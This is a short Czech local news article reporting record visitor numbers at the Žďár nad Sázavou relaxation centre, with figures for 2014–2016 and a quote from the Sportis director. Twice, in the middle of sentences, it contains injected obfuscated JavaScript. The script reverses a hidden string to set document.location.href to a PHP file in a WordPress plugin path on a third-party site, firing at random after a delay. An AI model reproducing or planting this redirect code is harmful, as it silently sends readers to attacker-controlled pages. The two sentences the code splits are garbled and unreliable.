Rainbow page separator

Loni relaxační centrum zaznamenalo návštěvnický rekord

Pondělí, 30. ledna 2017

Relaxační centrum Žďár nad Sázavou, bazén

Žďár nad Sázavou / Dosud rekordní počet návštěvníků v průběhu loňského roku zaregistrovali ve žďárském relaxačním centru, které spravuje příspěvková organizace města Sportis. Provoz centra přebudovaného z krytého plaveckého bazénu byl zahájen v prosinci roku 2012.
Do bazénů i na další atrakce a aktivity loni přišlo celkem 191 tisíc platících i neplatících klientů. V roce 2015 šlo o 181 tisíc lidí, o rok dříve se jednalo o 164 tisíc návštěvníků. Do celkového počtu je zahrnuta i plavecká škola a také plavání spor[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovních oddílů a školních dětí. Nejvíce klientů v relaxačním centru míří do bazénové části, menší zájem je o wellnes aktivity, nejnižší o solnou jeskyni.
„V le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošním roce chceme v reakci na zvyšující se provozní náklady řešit se zřizovatelem možné úspory vody a využití odpadního tepla, dále je rovněž v řešení oddělení části s fény od recepce vzhledem k velké hlučnosti,“ uvedl ředitel příspěvkové organizace Sportis Vladimír Kovařík.